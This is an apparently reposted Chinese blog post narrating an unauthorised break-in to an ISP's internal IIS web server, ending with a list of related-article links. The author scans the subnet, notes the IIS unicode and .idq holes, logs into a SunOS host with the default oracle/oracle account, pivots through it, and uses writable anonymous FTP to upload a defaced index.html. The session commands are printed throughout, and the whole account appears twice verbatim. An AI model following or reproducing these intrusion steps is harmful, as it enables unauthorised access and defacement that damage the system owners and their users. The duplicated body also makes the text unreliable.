【轉】21和80埠的入侵
首先申明我並不是一個HACKER,只是一個網路安全愛好者罷了。入侵的動機我保留,只記述過程啦!
目標主機:10.75.166.12(我的ISP的真實內部地址)。
目的:更改其WEB頁,還有別的麼?呵呵我保留!
首先:看看這個網段都有那些機子,還有他們都開什麼埠吧!我用scanner(很好的掃描工具)
查出有N部機子。(其實我早就掃過了,呵呵),哈10.75.166.12只開了21,80 兩個埠呀!
先FTP上去羅,ftp 10.75.166.12
unknown ip (10.75.167.87)
connected refused
呵呵,拒絕不知名的IP地址的聯接!faint...該死的網管!
telnet 10.75.166.12 80
從80埠TELNET進去後會出現一段提示,發現該主機用的是MS-IIS!呵呵漏洞好象蠻多的!
IIS5.0有個unicode字符集的漏洞,瀏覽器吧%c1%2f之類的字元解釋成""或“/”之類!
可以訪問一些系統目錄在用CMD。EXE可以執行一些程式,或可提交一些ASP檔案。具體的方法或原理
請自己去找資料學習!我麼?沒用到這個漏洞!那麼這臺機子都有那些漏洞呢?用twwwscan(超好的web
漏洞掃描軟體,是DOS介面的用BORLAND C++寫的,超cool)
廢話少說,twwwscan 10.75.166.12
哦,,,漏洞真不少。呵呵。有如下幾個:
frontpage的_vti_inf.html
newdsn.exe
anything.idq
....
OH!THAT IS ENOUGH!第一個嘛,我們知道它是FRONTPAGE予留的一個HTML檔案,沒什麼用!
第二個嘛, 可在目錄生成MDB檔案,用於D.O.S攻擊,把它的硬碟塞滿麼!!呵呵!對我來說沒有價值
第三個嘛,wow, *.idq這個漏洞我在灌水!棒,在瀏覽器上輸入任何字尾為IDQ的檔案,一般會返回一個類似
: "c:wwwrootshit.idq"not found!
呵呵原來網站放在wwwroot下!
現在問題是10.75.166.12不支援UNKNOW IP!我都要忍不住罵人了!!!
看看剛才掃描過的網段,一個一個telnet再ftp(若開了相應的埠的話)上去,看看有沒有
什麼預設帳號,(若沒有也不要急,小榕的流光2001來看看有沒有弱密碼使用者)
我還是比較幸運的10.75.166.11的21,23埠都開,而且都用SUNOS呵呵!
我們知到預設的使用者oracle的密碼還是oracle。可以用10.75.166.11做跳板了!
笨網管!!!!別怪我了!
telnet 10.75.166.11
login:oracle
password:
welcome!
SUNOS
you have a mail!
oracle@10.75.166.11>
登陸先看看有沒有root!
oracle@10.75.166.11>who
哇,沒有!COOL!該你倒黴!
oracle@10.75.166.11>ftp 10.75.166.12
ok!connected from 10.75.166.11
10.75.166.12 IIS
login:ftp(先試試匿名登陸的許可權麼!)
passwd:ftp@shit.com
ok!XXXX LOGGED IN
FTP>
沒忘把,剛才用*.idq得到的WWWROOT目錄!
FTP>CD WWWROOT
FTP>LS
.
.
.
FTP>
呵呵!看到了INDEX.HTML了!YEAH!!!笨網管,竟然允許匿名訪問這麼重要的目錄!
FTP>bye
BYE-BYE羅!
oracle@10.75.166.11>
再看看許可權如何:隨便PUT一個檔案看看可不可寫!別忘了再刪掉(其實也不用,看你的良心了)
YEAH!可寫呀!!撞大運了!真該今天去買體育彩票!
接下來,把做好的INDEX.HTML先傳到10.75.166.11的目錄下!(用FTP連到10.75.166.11再用ORACLE
帳戶登陸,因為要用10.75.166.11做跳板)
剛才的TELNET程式沒關把!好!看看!
oracle@10.75.166.11>ls
好呀!傳上來了有INDEX.HTML檔案耶!!
接下來,是個人就會了!
oracle@10.75.166.11>ftp 10.75.166.12
ftp>put index.html
ok!
231byte transported
ftp>bye
下面去看看自HACK的頁面吧!
目標主機:10.75.166.12(我的ISP的真實內部地址)。
目的:更改其WEB頁,還有別的麼?呵呵我保留!
首先:看看這個網段都有那些機子,還有他們都開什麼埠吧!我用scanner(很好的掃描工具)
查出有N部機子。(其實我早就掃過了,呵呵),哈10.75.166.12只開了21,80 兩個埠呀!
先FTP上去羅,ftp 10.75.166.12
unknown ip (10.75.167.87)
connected refused
呵呵,拒絕不知名的IP地址的聯接!faint...該死的網管!
telnet 10.75.166.12 80
從80埠TELNET進去後會出現一段提示,發現該主機用的是MS-IIS!呵呵漏洞好象蠻多的!
IIS5.0有個unicode字符集的漏洞,瀏覽器吧%c1%2f之類的字元解釋成""或“/”之類!
可以訪問一些系統目錄在用CMD。EXE可以執行一些程式,或可提交一些ASP檔案。具體的方法或原理
請自己去找資料學習!我麼?沒用到這個漏洞!那麼這臺機子都有那些漏洞呢?用twwwscan(超好的web
漏洞掃描軟體,是DOS介面的用BORLAND C++寫的,超cool)
廢話少說,twwwscan 10.75.166.12
哦,,,漏洞真不少。呵呵。有如下幾個:
frontpage的_vti_inf.html
newdsn.exe
anything.idq
....
OH!THAT IS ENOUGH!第一個嘛,我們知道它是FRONTPAGE予留的一個HTML檔案,沒什麼用!
第二個嘛, 可在目錄生成MDB檔案,用於D.O.S攻擊,把它的硬碟塞滿麼!!呵呵!對我來說沒有價值
第三個嘛,wow, *.idq這個漏洞我在灌水!棒,在瀏覽器上輸入任何字尾為IDQ的檔案,一般會返回一個類似
: "c:wwwrootshit.idq"not found!
呵呵原來網站放在wwwroot下!
現在問題是10.75.166.12不支援UNKNOW IP!我都要忍不住罵人了!!!
看看剛才掃描過的網段,一個一個telnet再ftp(若開了相應的埠的話)上去,看看有沒有
什麼預設帳號,(若沒有也不要急,小榕的流光2001來看看有沒有弱密碼使用者)
我還是比較幸運的10.75.166.11的21,23埠都開,而且都用SUNOS呵呵!
我們知到預設的使用者oracle的密碼還是oracle。可以用10.75.166.11做跳板了!
笨網管!!!!別怪我了!
telnet 10.75.166.11
login:oracle
password:
welcome!
SUNOS
you have a mail!
oracle@10.75.166.11>
登陸先看看有沒有root!
oracle@10.75.166.11>who
哇,沒有!COOL!該你倒黴!
oracle@10.75.166.11>ftp 10.75.166.12
ok!connected from 10.75.166.11
10.75.166.12 IIS
login:ftp(先試試匿名登陸的許可權麼!)
passwd:ftp@shit.com
ok!XXXX LOGGED IN
FTP>
沒忘把,剛才用*.idq得到的WWWROOT目錄!
FTP>CD WWWROOT
FTP>LS
.
.
.
FTP>
呵呵!看到了INDEX.HTML了!YEAH!!!笨網管,竟然允許匿名訪問這麼重要的目錄!
FTP>bye
BYE-BYE羅!
oracle@10.75.166.11>
再看看許可權如何:隨便PUT一個檔案看看可不可寫!別忘了再刪掉(其實也不用,看你的良心了)
YEAH!可寫呀!!撞大運了!真該今天去買體育彩票!
接下來,把做好的INDEX.HTML先傳到10.75.166.11的目錄下!(用FTP連到10.75.166.11再用ORACLE
帳戶登陸,因為要用10.75.166.11做跳板)
剛才的TELNET程式沒關把!好!看看!
oracle@10.75.166.11>ls
好呀!傳上來了有INDEX.HTML檔案耶!!
接下來,是個人就會了!
oracle@10.75.166.11>ftp 10.75.166.12
ftp>put index.html
ok!
231byte transported
ftp>bye
下面去看看自HACK的頁面吧!
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/11411056/viewspace-734405/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- 80埠入侵 CGI掃描器的原理和實現過程(轉)
- 域名和80埠
- 伺服器80埠和443埠的區別伺服器
- nginx埠轉發tomcat,80轉8080和8433NginxTomcat
- 【轉】1433埠入侵詳解
- ISP封了80和8080埠
- 入侵攻擊實戰中被利用的埠(轉)
- 網站伺服器80埠和443埠的區別網站伺服器
- 80埠被佔用及如何釋放80埠的方法
- 80埠的煩惱
- Ubuntu檢視和釋放80埠Ubuntu
- Mac 80埠占用Mac
- 利用135埠漏洞入侵個人電腦(轉)
- 如何用nginx在本地把9000埠轉發到80埠上Nginx
- Apache和IIS共享80埠的四個設定方法Apache
- Tomcat修改80埠,埠被佔用,System佔用80埠問題解決Tomcat
- 安裝vcenter server埠 80 和 IIS 衝突Server
- url跳轉的兩種實現方式 域名 80埠占用
- win10 檢視 80埠方法_win10如何檢視80埠Win10
- 在Linux上配置Resin 80埠自啟動(轉)Linux
- 443和80埠被佔用win10如何解決_443和80埠被佔用win10怎麼處理Win10
- windows 80埠被佔用Windows
- linux開放80 埠Linux
- IIS與Apache共用80埠Apache
- CactiEZ更改預設80埠
- 雲伺服器Apache和IIS共享80埠的設定方法伺服器Apache
- Valet 80 埠被佔用 It works
- 漫畫:80 埠爭奪戰
- weblogic 10.3使用80埠Web
- Java Web之tomcat修改80埠和專案對映JavaWebTomcat
- windows 80埠被佔用的解決方法Windows
- 3389埠的入侵,Win Server2000 全拼輸入法漏洞(轉)Server
- nginx 80埠監聽多個域名Nginx
- 騰訊雲無法訪問80埠
- 感謝banq將埠改為80
- frp配置本地服務埠到伺服器80埠FRP伺服器
- IIS的80埠被佔用怎麼辦呢
- Centos 7防火牆firewalld開放80埠CentOS防火牆